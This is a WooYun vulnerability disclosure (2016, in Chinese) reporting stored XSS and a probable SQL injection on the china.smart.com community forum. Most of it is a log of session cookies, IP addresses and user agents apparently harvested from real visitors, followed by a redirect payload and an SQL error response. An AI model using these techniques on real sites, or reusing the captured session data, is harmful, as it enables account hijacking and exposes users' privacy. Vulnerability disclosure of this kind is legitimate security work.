当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0212216

漏洞标题:奔驰某站可xss进行大规模攻击可盗取cookie泄露70万用户邮箱

相关厂商:mercedes-benz.com.cn

漏洞作者: 小龙

提交时间:2016-05-24 08:45

修复时间:2016-07-08 10:20

公开时间:2016-07-08 10:20

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-24: 细节已通知厂商并且等待厂商处理中
2016-05-24: 厂商已经确认,细节仅向厂商公开
2016-06-03: 细节向核心白帽子及相关领域专家公开
2016-06-13: 细节向普通白帽子公开
2016-06-23: 细节向实习白帽子公开
2016-07-08: 细节向公众公开

简要描述:

奔驰众所周知。所以影响力和知名度也挺大。

详细说明:

http://china.smart.com/
发个贴直接打到好多cookie

2016-05-23 19:37:51	
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_cloudClientUid=5098100; _s3_id.70.11ad=373515e76405866b.1456717680.1.1456717680.1456717680.; s_fid=419170AE858B54B6-328CF0C90E386238; _ga=GA1.2.934924694.1456142361; CNZZDATA1256330048=855823348-1462865484-http%253A%252F%252Fchina.smart.com%252F%7C1462865484; 3101c_jobpop=0; PHPSESSID=0ckn8lrcql2gtudopiilinrpb0; 3101c_ipstate=1463988652; 3101c_ck_info=%2F%09; _gat_UA-64858267-1=1; 3101c_ol_offset=97; 3101c_threadlog=%2C2%2C4%2C6%2C5%2C3%2C1%2C; __xsptplus531=531.204.1464003433.1464003466.8%233%7Cmp.weixin.qq.com%7C%7C%7C%7C%23%23jQf0T4URTzl4X8MM2xbVQuA1-a-ogZt2%23; _smt_uid=56caf818.e9297f3; _ga=GA1.3.934924694.1456142361; 3101c_readlog=%2C26557%2C26547%2C26461%2C26565%2C26327%2C26508%2C26475%2C26566%2C26564%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=14801%091464003471%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1464003471
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
REMOTE_ADDR : 106.2.187.18, 106.2.187.18
IP_ADDRESS : 北京市--优位风尚(北京)信息技术有限公司北京电信互联网数据中心节点
删除
-折叠 2016-05-23 19:03:16
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_cloudClientUid=5657565; __guid=84429515.501600539399940600.1458945515189.398; 3101c_jobpop=0; 3101c_ck_info=%2F%09; PHPSESSID=vg2bj8oh42usu9u3o178snv231; _gat_UA-64858267-1=1; 3101c_threadlog=%2C5%2C6%2C3%2C1%2C; 3101c_ol_offset=17945; 3101c_ipstate=1464001122; _ga=GA1.3.265934178.1455431546; _smt_uid=56c01f7a.321d9f0e; 3101c_readlog=%2C26527%2C26337%2C26560%2C26525%2C26511%2C26475%2C26565%2C26508%2C26564%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=10629%091464001395%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1464001395
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 123.120.244.6, 123.120.244.6
IP_ADDRESS : 北京市--联通
删除
-折叠 2016-05-23 18:35:22
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : PHPSESSID=vtr3d6nqtji403qkunvait9jv3; _gat_UA-64858267-1=1; 3101c_threadlog=%2C1%2C; 3101c_ol_offset=114266; 3101c_ipstate=1463999686; 3101c_cloudClientUid=1025753; __xsptplus531=531.1.1463999607.1463999703.4%234%7C%7C%7C%7C%7C%23%239kBRvzdtg_RinvHzchOXsrdLSykmrFha%23; _smt_uid=5742dc77.15131d4d; _ga=GA1.3.99492218.1463999608; 3101c_readlog=%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=130%091463999721%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463999720
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows; U; Windows NT 6.2; zh-cn) AppleWebKit/540.0 (KHTML, like Gecko) Safari/531.22.7 TheWorld 6
REMOTE_ADDR : 222.169.29.125, 222.169.29.125
IP_ADDRESS : 吉林省延边州延吉市--电信
删除
-折叠 2016-05-23 17:29:55
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : GTM_cookie_data[OMID]=2015073716; GTM_cookie_data[utm_term]=%E5%A5%94%E9%A9%B0smart; GTM_cookie_data[utm_content]=Text; 3101c_cloudClientUid=9910210; bdshare_firstime=1448764535354; GTM_cookie_data[utm_source]=H5; GTM_cookie_data[utm_medium]=Button; GTM_cookie_data[utm_campaign]=index; 3101c_jobpop=0; 3101c_ck_info=%2F%09; PHPSESSID=86d1cfd8reai309e4r3j2r68m0; _gat_UA-64858267-1=1; 3101c_threadlog=%2C2%2C1%2C; 3101c_ol_offset=77018; 3101c_ipstate=1463995782; __xsptplus531=531.319.1463995767.1463995783.3%231%7CH5%7CButton%7Cindex%7C%7C%23%23JJp_vmPXVtMcEGqw8Y6t3ewvxuEY0ga2%23; _smt_uid=565a4d4c.126d3c25; _ga=GA1.3.1728018780.1444733269; 3101c_readlog=%2C26384%2C26387%2C26048%2C26045%2C26402%2C26461%2C26474%2C26475%2C26486%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=12894%091463995794%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463995794
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36
REMOTE_ADDR : 113.26.156.219, 113.26.156.219
IP_ADDRESS : 山西省吕梁市--电信
删除
-折叠 2016-05-23 16:28:58
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_lastvisit=150%091463992136%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463992136; PHPSESSID=cdq231spc27hnfe0p2mpfatuf3; 3101c_lastpos=bbs; _smt_uid=5742beb4.42be43dc; _ga=GA1.3.984077766.1463991989; _gat_UA-64858267-1=1; 3101c_threadlog=%2C1%2C; 3101c_ol_offset=36278; 3101c_ipstate=1463992090; 3101c_cloudClientUid=9910110; 3101c_readlog=%2C26563%2C; __xsptplus531=531.1.1463991989.1463992090.3%234%7C%7C%7C%7C%7C%23%23zVa11Bfhk7Z7U5ehg0ODWUSAsglUBQIn%23
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-cn) AppleWebKit/534.7 (KHTML, like Gecko) Safari/531.2+ QIHU 360EE
REMOTE_ADDR : 115.159.192.29, 115.159.192.29
IP_ADDRESS : 河南省郑州市--
删除
-折叠 2016-05-23 13:41:53
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_lastvisit=53%091463981760%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463981758; PHPSESSID=9uaivhu5iabj68h425ppirgpq1; 3101c_lastpos=bbs; _ga=GA1.3.270982837.1463982070; _gat_UA-64858267-1=1; _smt_uid=574297f6.e616275; 3101c_threadlog=%2C1%2C; 3101c_ol_offset=4947; 3101c_cloudClientUid=1004852; 3101c_readlog=%2C26563%2C; __xsptplus531=531.1.1463982070.1463982100.3%234%7C%7C%7C%7C%7C%23%23gkYYhSooPn8NlAiWwYaXIDpIPGiBquIq%23
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
REMOTE_ADDR : 58.221.46.206, 58.221.46.206
IP_ADDRESS : 江苏省南通市--电信
删除
-折叠 2016-05-23 13:20:56
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_lastvisit=196%091463980503%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463980502; 3101c_lastpos=bbs; PHPSESSID=o3760ffnj6p0v2ntaqmhvufs27; _smt_uid=57429279.4a4f9719; _ga=GA1.3.215084626.1463980665; _gat_UA-64858267-1=1; 3101c_threadlog=%2C1%2C3%2C; 3101c_ol_offset=16005; 3101c_ipstate=1463980406; 3101c_cloudClientUid=5148555; 3101c_readlog=%2C26563%2C; __xsptplus531=531.1.1463980665.1463980806.4%234%7C%7C%7C%7C%7C%23%23tqqo-KO3yf-UfYL1ubr8mr8IE92M0N7W%23
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; 360SE)
REMOTE_ADDR : 223.215.138.84, 223.215.138.84
IP_ADDRESS : 安徽省马鞍山市--电信
删除
-折叠 2016-05-23 12:11:21
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_cloudClientUid=5157100; _ga=GA1.2.1996363318.1456703690; __xsptplus531=531.2.1463096466.1463096470.2%234%7C%7C%7C%7C%7C%23%23IRB_lojfK2RQjsfLH_m9gs3I4kGgcx1p%23; 3101c_ipstate=1463960732; PHPSESSID=msmvbcqgv6ib976qd666nlf9s7; 3101c_jobpop=0; 3101c_ck_info=%2F%09; 3101c_ol_offset=405; 3101c_threadlog=%2C6%2C4%2C5%2C2%2C3%2C1%2C; _gat_UA-64858267-1=1; _smt_uid=56d388c9.9b4464d; _ga=GA1.3.1996363318.1456703690; 3101c_readlog=%2C24729%2C26387%2C26515%2C26552%2C26553%2C26461%2C26527%2C26562%2C26422%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=8025%091463976330%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463976329
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 211.103.128.2, 211.103.128.2
IP_ADDRESS : 北京市--电信通
删除
-折叠 2016-05-23 12:11:18
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_cloudClientUid=5157100; _ga=GA1.2.1996363318.1456703690; __xsptplus531=531.2.1463096466.1463096470.2%234%7C%7C%7C%7C%7C%23%23IRB_lojfK2RQjsfLH_m9gs3I4kGgcx1p%23; 3101c_ipstate=1463960732; PHPSESSID=msmvbcqgv6ib976qd666nlf9s7; 3101c_jobpop=0; 3101c_ck_info=%2F%09; 3101c_ol_offset=405; 3101c_threadlog=%2C6%2C4%2C5%2C2%2C3%2C1%2C; _smt_uid=56d388c9.9b4464d; _ga=GA1.3.1996363318.1456703690; _gat_UA-64858267-1=1; 3101c_readlog=%2C24729%2C26387%2C26515%2C26552%2C26553%2C26461%2C26527%2C26562%2C26422%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=8022%091463976327%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463976327
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 211.103.128.2, 211.103.128.2
IP_ADDRESS : 北京市--电信通
删除
-折叠 2016-05-23 11:34:05
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : _ga=GA1.2.437665837.1458302181; 3101c_cloudClientUid=1001019; __xsptplus531=531.6.1461639837.1461640608.7%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23DGrTCJ_V6hx-_knzHkmuTyAhU7fjS8ip%23; 3101c_ipstate=1463952570; PHPSESSID=8q7iig9k8rpee6s535l3om5ve2; 3101c_threadlog=%2C6%2C2%2C5%2C1%2C; _smt_uid=56ebece5.2e1be1d0; _gat_UA-64858267-1=1; _ga=GA1.3.437665837.1458302181; 3101c_ol_offset=17654; 3101c_readlog=%2C26541%2C26550%2C26549%2C26545%2C26556%2C26551%2C26554%2C26555%2C26560%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=8552%091463974094%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463974093
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
REMOTE_ADDR : 121.17.67.171, 121.17.67.171
IP_ADDRESS : 河北省衡水市--联通
删除
-折叠 2016-05-23 11:24:18
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_lastvisit=194%091463973497%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463973496; PHPSESSID=o6vrtdivi9ejcgtamp1ac4oaq5; 3101c_lastpos=bbs; _ga=GA1.3.1732587367.983967962; _gat_UA-64858267-1=1; _smt_uid=3aa628da.1ac61486; 3101c_ol_offset=970; 3101c_threadlog=%2C1%2C; 3101c_cloudClientUid=4810155; 3101c_readlog=%2C26563%2C; __xsptplus531=531.1.983967967.983968108.4%234%7C%7C%7C%7C%7C%23%23jZiY_gOr6ldTwREqaQTFxqHBAFPwtpbX%23
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 9.0; qdesk 2.3.1186.202; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) QQBrowser/6.12.12934.201
REMOTE_ADDR : 111.177.230.226, 111.177.230.226
IP_ADDRESS : 湖北省随州市--电信
删除
-折叠 2016-05-23 10:59:55
location : http://china.smart.com/community/read-htm-tid-26563-ds-1.html#tpc
toplocation : http://china.smart.com/community/read-htm-tid-26563-ds-1.html#tpc
cookie : 3101c_cloudClientUid=5157100; _ga=GA1.2.1996363318.1456703690; __xsptplus531=531.2.1463096466.1463096470.2%234%7C%7C%7C%7C%7C%23%23IRB_lojfK2RQjsfLH_m9gs3I4kGgcx1p%23; 3101c_ipstate=1463960732; PHPSESSID=msmvbcqgv6ib976qd666nlf9s7; 3101c_jobpop=0; 3101c_ck_info=%2F%09; 3101c_ol_offset=405; 3101c_threadlog=%2C6%2C4%2C5%2C2%2C3%2C1%2C; _gat_UA-64858267-1=1; _smt_uid=56d388c9.9b4464d; _ga=GA1.3.1996363318.1456703690; 3101c_readlog=%2C24729%2C26387%2C26515%2C26552%2C26553%2C26461%2C26527%2C26562%2C26422%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=3739%091463972044%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463972044
opener :
HTTP_REFERER : http://china.smart.com/community/read-htm-tid-26563-ds-1.html
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 211.103.128.2, 211.103.128.2
IP_ADDRESS : 北京市--电信通
删除
-折叠 2016-05-23 10:49:53
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : PHPSESSID=9inap51ffrkmf78csvr0q0ffd7; _gat_UA-64858267-1=1; 3101c_threadlog=%2C1%2C; 3101c_cloudClientUid=5250574; __xsptplus531=531.1.1463980490.1463980592.3%234%7C%7C%7C%7C%7C%23%231J9IwlYTPUECaVlgfr0Bfr8g2UZTmMqQ%23; _smt_uid=574291ca.132ef79b; _ga=GA1.3.555889000.1463980491; 3101c_ol_offset=4947; 3101c_readlog=%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=152%091463971441%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463971440
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.0; Trident/5.0; IEMobile/9.0; SONY; Xperia W8)
REMOTE_ADDR : 106.41.107.86, 106.41.107.86
IP_ADDRESS : 吉林省延边州--电信
删除
-折叠 2016-05-23 10:45:15
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : _ga=GA1.3.1419157285.1459420580; _gat_UA-64858267-1=1; _smt_uid=56fcfda3.34ab9774; 3101c_ck_info=%2F%09; 3101c_cloudClientUid=5654525; 3101c_ipstate=1463970827; 3101c_jobpop=0; 3101c_lastpos=bbs; 3101c_lastvisit=1246%091463971163%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463971163; 3101c_ol_offset=308; 3101c_readlog=%2C26547%2C26548%2C26555%2C26554%2C26553%2C26551%2C26552%2C26556%2C26557%2C26563%2C; 3101c_threadlog=%2C5%2C3%2C4%2C6%2C2%2C1%2C; PHPSESSID=ni8f3viidtsdto4fvvnrbd5fq7; __xsptplus531=531.140.1463971188.1463971511.9%233%7Cwww.the-smart-class.cn%7C%7C%7C%7C%23%23RYJvReoew3-FHUDRl-jJVzoaQSWDkYWq%23
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17
REMOTE_ADDR : 106.2.187.18, 106.2.187.18
IP_ADDRESS : 北京市--优位风尚(北京)信息技术有限公司北京电信互联网数据中心节点
删除
-折叠 2016-05-23 09:40:21
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : PHPSESSID=6kjbagbi1gs4gm979jpq41fv14; _gat_UA-64858267-1=1; 3101c_ck_info=%2F%09; 3101c_threadlog=%2C1%2C; 3101c_ipstate=1463967256; _smt_uid=573d2931.9739967; 3101c_ol_offset=405; 3101c_readlog=%2C26544%2C26541%2C26535%2C26534%2C26542%2C26543%2C26521%2C26563%2C26527%2C; 3101c_lastpos=other; 3101c_lastvisit=254%091463967268%09%2Fpost.php%3Ffid6%26actionreply%26tid26527; 3101c_ci=post%091463967268%09%09; __xsptplus531=531.2.1463967342.1463967614.5%234%7C%7C%7C%7C%7C%23%23MqQwRt5fJximWmDMKnrs6uJdpPJicQj_%23; _ga=GA1.3.871014083.1463626015
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
REMOTE_ADDR : 106.120.122.135, 106.120.122.135
IP_ADDRESS : 北京市--中国石油天然气集团公司
删除
-折叠 2016-05-23 09:14:29
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : PHPSESSID=0q62c44vla84o5kdvhmbkgcgo6; _gat_UA-64858267-1=1; 3101c_ck_info=%2F%09; 3101c_threadlog=%2C1%2C; 3101c_ipstate=1463965695; 3101c_ol_offset=211; _smt_uid=5742598a.4f25ab96; _ga=GA1.3.877098622.1463966089; 3101c_readlog=%2C26422%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=28%091463965716%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463965716
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
REMOTE_ADDR : 221.193.197.130, 221.193.197.130
IP_ADDRESS : 河北省邯郸市--联通
删除
-折叠 2016-05-23 05:35:30
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : _ga=GA1.2.437665837.1458302181; 3101c_cloudClientUid=1001019; __xsptplus531=531.6.1461639837.1461640608.7%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23DGrTCJ_V6hx-_knzHkmuTyAhU7fjS8ip%23; PHPSESSID=9gkfv7qlf0ftpliv97945i5s14; 3101c_threadlog=%2C6%2C2%2C5%2C1%2C; 3101c_ipstate=1463952570; _smt_uid=56ebece5.2e1be1d0; _gat_UA-64858267-1=1; _ga=GA1.3.437665837.1458302181; 3101c_ol_offset=4947; 3101c_readlog=%2C26543%2C26541%2C26550%2C26549%2C26545%2C26556%2C26551%2C26554%2C26555%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=8488%091463952578%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463952578
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
REMOTE_ADDR : 121.17.67.171, 121.17.67.171
IP_ADDRESS : 河北省衡水市--联通
删除
-折叠 2016-05-22 20:01:01
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : PHPSESSID=s6h0j6t3te2b0t011bllneq7f5; _ga=GA1.2.1836474531.1463916097; 3101c_cloudClientUid=5155525; _gat_UA-64858267-1=1; 3101c_threadlog=%2C3%2C1%2C; __xsptplus531=531.3.1463917088.1463918333.32%232%7Cwww.baidu.com%7C%7C%7C%7C%23%23MnHWgR_NHgRCQ9VmWEZqPV2pQApUaH4F%23; _smt_uid=5741963f.63a6692; _ga=GA1.3.1836474531.1463916097; 3101c_ol_offset=582; 3101c_readlog=%2C26422%2C26337%2C26461%2C26474%2C26327%2C25879%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=2246%091463918110%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463918110
opener : http://china.smart.com/community/point.php
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
REMOTE_ADDR : 14.150.213.212, 14.150.213.212
IP_ADDRESS : 广东省广州市--电信
删除
-折叠 2016-05-22 18:24:45
location : http://china.smart.com/read-htm-tid-26563-ds-1-page-e.html#a
toplocation : http://china.smart.com/read-htm-tid-26563-ds-1-page-e.html#a
cookie : 3101c_cloudClientUid=5657565; __guid=84429515.501600539399940600.1458945515189.398; 3101c_ipstate=1463892202; 3101c_jobpop=0; PHPSESSID=sr4g737qqlqoaakgp9k7m1dji5; _gat_UA-64858267-1=1; 3101c_threadlog=%2C5%2C6%2C3%2C1%2C; 3101c_ck_info=%2F%09; 3101c_ol_offset=308; _smt_uid=56c01f7a.321d9f0e; _ga=GA1.3.265934178.1455431546; 3101c_readlog=%2C26454%2C26475%2C26531%2C26562%2C26527%2C26337%2C26560%2C26525%2C26511%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=18%091463912334%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463912334
opener :
HTTP_REFERER : http://china.smart.com/read-htm-tid-26563-ds-1-page-e.html
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 123.120.244.6, 123.120.244.6
IP_ADDRESS : 北京市--联通
删除
-折叠 2016-05-22 18:24:31
location : http://china.smart.com/community/read-htm-tid-26563-ds-1.html#tpc
toplocation : http://china.smart.com/community/read-htm-tid-26563-ds-1.html#tpc
cookie : 3101c_cloudClientUid=5657565; __guid=84429515.501600539399940600.1458945515189.398; 3101c_ipstate=1463892202; 3101c_jobpop=0; PHPSESSID=sr4g737qqlqoaakgp9k7m1dji5; _gat_UA-64858267-1=1; 3101c_threadlog=%2C5%2C6%2C3%2C1%2C; 3101c_ck_info=%2F%09; _smt_uid=56c01f7a.321d9f0e; _ga=GA1.3.265934178.1455431546; 3101c_ol_offset=308; 3101c_readlog=%2C26454%2C26475%2C26531%2C26562%2C26527%2C26337%2C26560%2C26525%2C26511%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=4%091463912320%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463912319
opener :
HTTP_REFERER : http://china.smart.com/community/read-htm-tid-26563-ds-1.html
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 123.120.244.6, 123.120.244.6
IP_ADDRESS : 北京市--联通
删除
-折叠 2016-05-22 18:23:33
location : http://china.smart.com/community/read.php?tid=26563
toplocation : http://china.smart.com/community/read.php?tid=26563
cookie : 3101c_cloudClientUid=5657565; __guid=84429515.501600539399940600.1458945515189.398; 3101c_ipstate=1463892202; 3101c_jobpop=0; 3101c_ck_info=%2F%09; PHPSESSID=sr4g737qqlqoaakgp9k7m1dji5; _gat_UA-64858267-1=1; 3101c_threadlog=%2C5%2C6%2C3%2C1%2C; _smt_uid=56c01f7a.321d9f0e; _ga=GA1.3.265934178.1455431546; 3101c_ol_offset=582; 3101c_readlog=%2C26454%2C26475%2C26531%2C26562%2C26527%2C26337%2C26560%2C26525%2C26511%2C26563%2C; 3101c_lastpos=bbs; 3101c_lastvisit=8933%091463912263%09%2Fmode.php%3Fmarea%26qheader%26ifactive%26alias%26t1463912262
opener :
HTTP_REFERER : http://china.smart.com/community/read.php?tid=26563
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
REMOTE_ADDR : 123.120.244.6, 123.120.244.6
IP_ADDRESS : 北京市--联通


其实xss的cookie虽然做了 httponly
我们还可以比如

<html>
<head>
<title>正在跳转</title>
<meta http-equiv="Content-Language" content="zh-CN">
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<meta http-equiv="refresh" content="0.2;url=http://www.wooyun.org/">
</head>
<body>
</body>
</html>


http://china.smart.com/community/read.php?tid=26577

1.jpg


2.jpg


3.jpg


4.jpg


访问就跳转了。。
还有一处好像是sql注入。。
不太清楚
在管理员消息删除哪里

HTTP/1.1 200 OK
Server: Tengine
Content-Type: text/html
Connection: keep-alive
Date: Mon, 23 May 2016 15:23:26 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 3101c_lastpos=other; expires=Tue, 23-May-2017 15:23:26 GMT; Max-Age=31536000; path=/
Set-Cookie: 3101c_lastvisit=15341%091464017006%09%2Fmessage.php%3Ftypemanagelist%26ajaxs1%26mid111; expires=Tue, 23-May-2017 15:23:26 GMT; Max-Age=31536000; path=/
Vary: Accept-Encoding
Via: cache40.l2nu16-1[42,200-0,M], cache32.l2nu16-1[43,0], kunlun10.cn130[74,200-0,M], kunlun9.cn130[75,0]
X-Cache: MISS TCP_MISS dirn:-2:-2
X-Swift-SaveTime: Mon, 23 May 2016 15:23:26 GMT
X-Swift-CacheTime: 0
Timing-Allow-Origin: *
EagleId: 7ca0888a14640170062485037e
Content-Length: 1330
<!doctype html><head><meta charset='utf-8' /><title>smart</title><link rel="stylesheet" href="images/core.css?101128" /><style>.tips{border:3px solid #dcc7ab;background:#fffef5;font:12px/1.5 Arial,Microsoft Yahei,Simsun;color:#000;padding:20px;width:500px;margin:50px auto;-moz-box-shadow:0 0 5px #eaeaea;box-shadow:0 0 5px #eaeaea;}a{text-decoration:none;color:#014c90;}a:hover,.alink a,.link{text-decoration:underline;}</style><div class="tips"><table width="100%"><tr><td><h2 class="f14 b">&#x9519;&#x8BEF;&#x4FE1;&#x606F;:</h2><p>Query Error: UPDATE `zhydb_managemsg` SET del=1 WHERE id=111\&#39;</p><br><h2 class="f14 b">&#x94FE;&#x63A5;&#x5730;&#x5740;(The URL Is):</h2>http://china.smart.com/message.php?type=managelist&ajaxs=1&mid=111<br><br><h2 class="f14 b">MySQL&#x670D;&#x52A1;&#x5668;&#x9519;&#x8BEF;(MySQL Server Error):</h2>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\&#39' at line 1 ( 1064 ) <a target='_blank' href='http://faq.zhy88.com/mysql.php?id=1064'>&#26597;&#30475;&#38169;&#35823;&#30456;&#20851;&#20449;&#24687;</a><br><br><h2 class="f14 b">&#x5BFB;&#x6C42;&#x5E2E;&#x52A9;(You Can Get Help In):</h2><a target='_blank' href='http://www.zhy88.com'>http://www.zhy88.com</a></td></tr></table></div></body></html>


5.jpg


你们自己还是查查吧
http://china.smart.com/sendpwd-htm-action-zhmm_step_wait-wxid-776224.html
找回密码
